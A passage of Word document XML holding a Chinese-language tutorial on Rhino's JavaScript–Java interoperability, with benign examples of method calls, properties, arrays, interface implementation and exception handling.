        <w:t>f instanceof java.io.File//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>out instanceof java.io.Reader//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false:</w:t>
      </w:r>
      <w:r>
        <w:t>它是</w:t>
      </w:r>
      <w:r>
        <w:t>Writer</w:t>
      </w:r>
      <w:r>
        <w:t>而非</w:t>
      </w:r>
      <w:r>
        <w:t>Reader</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>out instanceof java.io.Closeable//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:Writer</w:t>
      </w:r>
      <w:r>
        <w:t>实现</w:t>
      </w:r>
      <w:r>
        <w:t>Closeable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如你所见，在之前的对象实例化示例中，</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>允许把值传给</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数，并将构造函数的返回值赋给</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>变量。（注意，在这个例子中</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>执行了隐式类型转换：</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"/type/test"</w:t>
      </w:r>
      <w:r>
        <w:t>自动转换成</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>java.lang.String</w:t>
      </w:r>
      <w:r>
        <w:t>值。）</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>方法更像</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数，而</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>允许</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序调用</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>静态</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>方法工作类似</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>java.lang.System.getProperty("java.vers</w:t>
      </w:r>
      <w:r>
        <w:t>ion")//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>版本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var isDigit=java.lang.Character.isDigit;//</w:t>
      </w:r>
      <w:r>
        <w:t>把静态方法赋值给变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>isDigit("2")//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:</w:t>
      </w:r>
      <w:r>
        <w:t>阿拉伯数字</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>的实例方法，</w:t>
      </w:r>
      <w:r>
        <w:t>out</w:t>
      </w:r>
      <w:r>
        <w:t>已经在前面创建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>out.write("Hello World\n");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>out.close();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var len=f.length();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>也允许</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码查询、设置</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>类的静态字段和</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>对象的实例字段。</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>类通常利用</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>sette</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>方法避免定义公共字段。当</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法存在时，</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>将其显示为</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>读取</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>类的静态字段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var stdout=java.lang.System.out;//Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>把</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法映射到单个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f.name//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"/tmp/test":</w:t>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>f.getName()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>f.directory//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false:</w:t>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>f.isDirectory()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>允许重载方法，它们名字相同但签名不同。一般，</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>能根据</w:t>
      </w:r>
      <w:r>
        <w:t>传递的参数类型判断出所要调用方法的版本。不过偶尔也需要通过名字和签名来明确识别方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>假设</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>有一个名为</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>的方法，它接受</w:t>
      </w:r>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>float</w:t>
      </w:r>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，必须明确指定签名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o['f(int)'](3);//</w:t>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o['f(float)'](Math.PI);//</w:t>
      </w:r>
      <w:r>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:t>float</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环能遍历</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>类和对象的方法、字段和属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>importClass(java.lang.System);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">for(var m in </w:t>
      </w:r>
      <w:r>
        <w:t>System)print(m);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>java.lang.System</w:t>
      </w:r>
      <w:r>
        <w:t>的静态成员</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(m in f)print(m);//</w:t>
      </w:r>
      <w:r>
        <w:t>输出</w:t>
      </w:r>
      <w:r>
        <w:t>java.io.File</w:t>
      </w:r>
      <w:r>
        <w:t>的实例成员</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注意不能用这种方法枚举包中的类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(c in java.lang)print(c);//</w:t>
      </w:r>
      <w:r>
        <w:t>无法工作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>允许</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序获取、设置</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>数组的元素，就像它们是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数组那样。当然，</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>数组和</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数组并不完全一致：</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>数组长度固定、元素类型统一，但不具备像</w:t>
      </w:r>
      <w:r>
        <w:t>slice()</w:t>
      </w:r>
      <w:r>
        <w:t>这样的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>方法。由于没有现成的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语法可供</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>扩展</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序从而创建新的</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>数组，因此必须使用</w:t>
      </w:r>
      <w:r>
        <w:t>java.lang.reflect.Array</w:t>
      </w:r>
      <w:r>
        <w:t>类来实现：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>分别创建一个长度为</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>的字符串数组和一个长度为</w:t>
      </w:r>
      <w:r>
        <w:t>128</w:t>
      </w:r>
      <w:r>
        <w:t>字节的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>words=java.lang.reflect.Array.newInstance(java.lang.String,10);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var bytes=java.lang.reflect.Array.newInstance(java.lang.Byte.TYPE,128);//</w:t>
      </w:r>
      <w:r>
        <w:t>一旦创建了数组，就能像</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数组一样使用它们</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>bytes.length;i++)bytes[i]=i;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>编程经常涉及实现接口，这在</w:t>
      </w:r>
      <w:r>
        <w:t>GUI</w:t>
      </w:r>
      <w:r>
        <w:t>编程中很常见，每个事件处理程序都必须实现事件监听接</w:t>
      </w:r>
      <w:r>
        <w:t>口，接下来的例子将演示如何实现</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>事件监听接口：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>接口：如下所示实现接口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var handler=new java.awt.event.FocusListener({</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>focusGained:function(e){print("got focus");},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>focusLost:function(e){print("lost focus");}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});//</w:t>
      </w:r>
      <w:r>
        <w:t>用同样的方式扩展抽象类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var handler=new java.awt.event.WindowAdapter({</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>windowClosing</w:t>
      </w:r>
      <w:r>
        <w:t>:function(e){java.lang.System.exit(0);}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});//</w:t>
      </w:r>
      <w:r>
        <w:t>当接口只有一个方法，可以使用一个函数取而代之</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>button.addActionListener(function(e){print("button clicked");});//</w:t>
      </w:r>
      <w:r>
        <w:t>如果接口或抽象类的所有方法都有相同的签名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>则可以使用一个单独的函数作为接口的实现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>且</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>将把方法名作为最后一个参数传入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>frame.addWindowListener(function(e,name){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(name==="wi</w:t>
      </w:r>
      <w:r>
        <w:t>ndowClosing")java.lang.System.exit(0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});//</w:t>
      </w:r>
      <w:r>
        <w:t>如果需要一个对象实现多重接口，则使用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaAdapter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o=new JavaAdapter(java.awt.event.ActionListener,java.lang.Runnable,{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>run:function(){},//</w:t>
      </w:r>
      <w:r>
        <w:t>实现</w:t>
      </w:r>
      <w:r>
        <w:t>Runnable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>actionPerformed:function(e){}//</w:t>
      </w:r>
      <w:r>
        <w:t>实现</w:t>
      </w:r>
      <w:r>
        <w:t>ActionListener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当</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>方法抛出异常，</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>将其作为</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>异常传递。通过</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>错误对象的</w:t>
      </w:r>
      <w:r>
        <w:t>javaException</w:t>
      </w:r>
      <w:r>
        <w:t>属性可以获取原始的</w:t>
      </w:r>
      <w:r>
        <w:t>Java java.lang.Exception</w:t>
      </w:r>
      <w:r>
        <w:t>对象：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>try{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>java.lang.System.getProperty(null);//null</w:t>
      </w:r>
      <w:r>
        <w:t>不是合法的参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>catch(e){//e</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>print(e.javaException);//</w:t>
      </w:r>
      <w:r>
        <w:t>它包含一个</w:t>
      </w:r>
      <w:r>
        <w:t>java.lang.NullPointerException</w:t>
      </w:r>
      <w:r>
        <w:t>异常</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最后，必</w:t>
      </w:r>
      <w:r>
        <w:t>须注意</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>的类型转换。</w:t>
      </w:r>
      <w:r>
        <w:t>Rhino</w:t>
      </w:r>
      <w:r>
        <w:t>会按需要自动转换原始数字、布尔值和</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:t>类型被当做</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数字对待，因为</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>没有字符类型。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>字符串能自动转换成</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
